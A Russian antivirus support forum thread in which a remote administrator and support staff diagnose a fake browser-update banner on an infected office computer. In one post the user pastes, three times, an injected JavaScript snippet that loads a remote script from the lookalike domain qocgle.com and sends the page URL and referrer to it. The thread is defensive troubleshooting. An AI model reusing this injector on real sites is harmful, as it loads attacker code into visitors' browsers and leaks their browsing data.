174 ответов в этой теме

[lawpin]

Скажем прямо мозиллу то я и устанавливал как альтернативу "побитому вирусом IE", а оказалось что не все так просто.
архив "shark" прилепил, сейчас поставлю оперу и хром - отпишусь о результатах.
зы: отчет sysinfo в предыдущих логах

Прикрепленные файлы:

•  drweb32w.zip   359,77К   21 Скачано раз

Сообщение было изменено lawpin: 23 Июнь 2011 - 20:17

[Ko6Ra]

В посте #3 логов нашей утилиты dwsysinfo нет. По крайней мере я их не вижу...

Т.е. на момент заражения FF еще не был установлен?

[Dane]

тот код, что вы кинули написан на javascript. Попробуйте в ехплорере отключить javascript и перезагрузите браузер и понаблюдайте будет ли появляться банер. Можете попробовать в гейте занести в черный список адрес и снова поиграть браузером

Сообщение было изменено Dane: 23 Июнь 2011 - 20:37

[Ko6Ra]

тот код, что вы кинули написан на javascript. Попробуйте в ехплорере отключить javascript и перезагрузите браузер и понаблюдайте будет ли появляться банер. Можете попробовать в гейте занести в черный список адрес и снова поиграть браузером

Что это даст? Нужно источник искать, а не с симптомами бороться. Хотелось бы увидеть лог dwsysinfo и после некоторой медитации уже можно будет что-то сказать.

[Dane]

что у вас с hosts чистый?

[Ko6Ra]

Dane.
1) в логе hj оно есть,
2) В логах avz оно есть,
3) в ожидаемом sysinfo оно есть,
4) многократно запущенный сканер уже бы нашел "отклонения" в нем.

Если нет желания смотреть самостоятельно, то не стоит об этом просить.

[lawpin]

Какие славные ребята постарались нарисовать морды для каждого браузера, прям поверить хочется, что мне нужны обновления
Opera

...

opera.jpg   80К   23 Скачано раз <script>if&#40;self==top&#41;{ document.write&#40;&#34;<script src=&#39;http&#34; + &#40;&#40;&#34;https&#58;&#34; == document.location.protocol&#41; ? &#34;s&#34; &#58; &#34;&#34;&#41; + &#34;&#58;//qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran=&#34;+encodeURIComponent&#40;&#34;tS3NkLiAAhxjM7TlwYhwd4cy1s2BTxwnGB+VjWbn2UHTQvtd/HWxXSd5+XMsuFWA&#34;&#41;+&#34;&r=&#34;+escape&#40;document.referrer&#41;+&#34;&u=&#34;+escape&#40;document.URL&#41;+&#34;&v=351&&#34;+Math.random&#40;&#41;+&#34;&#39;>&#34;+unescape&#40;&#34;%3C/script%3E&#34;&#41;&#41;;}</script>

IE

...

ie.jpg   87,88К   20 Скачано раз <script>if&#40;self==top&#41;{ document.write&#40;&#34;<script src=&#39;http&#34; + &#40;&#40;&#34;https&#58;&#34; == document.location.protocol&#41; ? &#34;s&#34; &#58; &#34;&#34;&#41; + &#34;&#58;//qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran=&#34;+encodeURIComponent&#40;&#34;tS3NkLiAAhxjM7TlwYhwd4cy1s2BTxwnGB+VjWbn2UHTQvtd/HWxXSd5+XMsuFWA&#34;&#41;+&#34;&r=&#34;+escape&#40;document.referrer&#41;+&#34;&u=&#34;+escape&#40;document.URL&#41;+&#34;&v=351&&#34;+Math.random&#40;&#41;+&#34;&#39;>&#34;+unescape&#40;&#34;%3C/script%3E&#34;&#41;&#41;;}</script>

Firefox

...

ff.jpg   100,44К   17 Скачано раз <script>if&#40;self==top&#41;{ document.write&#40;&#34;<script src=&#39;http&#34; + &#40;&#40;&#34;https&#58;&#34; == document.location.protocol&#41; ? &#34;s&#34; &#58; &#34;&#34;&#41; + &#34;&#58;//qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran=&#34;+encodeURIComponent&#40;&#34;tS3NkLiAAhxjM7TlwYhwd4cy1s2BTxwnGB+VjWbn2UHTQvtd/HWxXSd5+XMsuFWA&#34;&#41;+&#34;&r=&#34;+escape&#40;document.referrer&#41;+&#34;&u=&#34;+escape&#40;document.URL&#41;+&#34;&v=351&&#34;+Math.random&#40;&#41;+&#34;&#39;>&#34;+unescape&#40;&#34;%3C/script%3E&#34;&#41;&#41;;}</script>

Google Chrome выбился из всей этой братии и категорически отказался открывать какой бы то ни было контент! Открывается - ввожу адрес и висит пустое окно и "обмен данными".

[Borka]

Ko6Ra, у тебя есть идеи?

Сообщение было изменено Borka: 23 Июнь 2011 - 20:59

[Ko6Ra]

Ko6Ra, у тебя есть идеи?

Еще осталось логи dwsysinfo увидеть и мы со всеми присутствующими здесь саппортерами будем над всем этим медитировать

[Borka]

Ko6Ra, у тебя есть идеи?

Еще осталось логи dwsysinfo увидеть и мы со всеми присутствующими здесь саппортерами будем над всем этим медитировать

Ясно.

lawpin, а на какие сайты Вы заходите, что появляется банер?

[Grinopas]

Одна элита собралась, прям не знаю что тут делать... Пожалуй просто понаблюдаю

[lawpin]

Добавил сисинфо.

Сайты исходя из специфики основной деятельности автодилера, вылез впервые на exist.ru, после каких манипуляций добиться не удалось.
Сейчас стабильно появляется на exist.ru, mail.ru, почти 100% вероятность, на остальных реже, но если появился - висит куда не перейдешь. Перед появлением проявляется битый html.

В качестве психологического портрета пациент - женщина ~40 менеджер по заказу запчастей. анализы крови не сдавали, ксерокопию паспорта не просил.

История заражения:

...

я - приходящая няня удаленный админ. Звонят подопечные и говорят: "браузер пишет, что найден вирус, что делать?". Сказал чтобы запустили доктора на проверку, компа под рукой не было. Когда добрался до компа, зашел удаленкой, сканируется доктором, вирусов не найдено. - проверил руками autoruns, процессы.. ничего особенного. сканер завершился без вирусов. - поставил FF думал в IE какой нибудь бар поставили до кучи. а в FF та же история. - приехал живьем, из авз не удается сделать восстановление системы.. в безопасном восстановил. - курит в безопасном ничего не нашел - скачал KAV removal tool загрузился с флешки, поставил на ночь сканировать всё - утром в карантине только старые вирусы из карантина когда то стоявшего до меня симантека.

Прикрепленные файлы:

•  BEL_IA_COMP3_l.altuhova_230611_130301.zip   2,31Мб   13 Скачано раз

[Ko6Ra]

Дайте, пожалуйста, вот эту штуку напосмотреть в личку:
C:\WINDOWS\apppatch\zziexnm.dat

[Ko6Ra]

Кто у вас живет по IP 192.168.1.2 ?

192.168.113.1 и 192.168.217.1 - это от VMware? Они сейчас включены?

И можете сделать новый лог dwsysinfo? Вы прислали сделанный в обед...
Интересует лог, когда VMware совсем выключена, запущены какие-либо два браузера с воспроизводящейся проблемой.

Сообщение было изменено Ko6Ra: 23 Июнь 2011 - 21:53

[Aleksandra]

Дайте, пожалуйста, вот эту штуку напосмотреть в личку:
C:\WINDOWS\apppatch\zziexnm.dat

Где Вы его высмотрели? Зверя уже нет давно.

[Ko6Ra]

Дайте, пожалуйста, вот эту штуку напосмотреть в личку:
C:\WINDOWS\apppatch\zziexnm.dat

Где Вы его высмотрели? Зверя уже нет давно.

Да, по другим логам оказалось что нет.

[Borka]

Дайте, пожалуйста, вот эту штуку напосмотреть в личку:
C:\WINDOWS\apppatch\zziexnm.dat

А где ты такой файл нашел?

Тьфу, блин. Аж глаза на лоб вылезли, пока этот файл искал.

Сообщение было изменено Borka: 23 Июнь 2011 - 22:08

[Ko6Ra]

Дайте, пожалуйста, вот эту штуку напосмотреть в личку:
C:\WINDOWS\apppatch\zziexnm.dat

А где ты такой файл нашел?

SystemRegistryExport.xml

Но да, его больше нигде нет.

Ну чтож, у нас еще есть пара вариантов на закуску

[lawpin]

192.168.113.1 и 192.168.217.1 - это от VMware? Они сейчас включены?

да VMWare ACE с каталогами, спит

извиняюсь за dwsysinfo прикрепил не ту версию.

дневной инфо был с запущенной виртуалкой, вечерний с выключенной

Прикрепленные файлы:

•  BEL_IA_COMP3_l.altuhova_230611_215648.zip   2,58Мб   10 Скачано раз

Сообщение было изменено lawpin: 23 Июнь 2011 - 22:19

[Borka]

Дайте, пожалуйста, вот эту штуку напосмотреть в личку:
C:\WINDOWS\apppatch\zziexnm.dat

А где ты такой файл нашел?

SystemRegistryExport.xml
Но да, его больше нигде нет.

А, до этого файла я не добрался. Я смотрел лог сканера...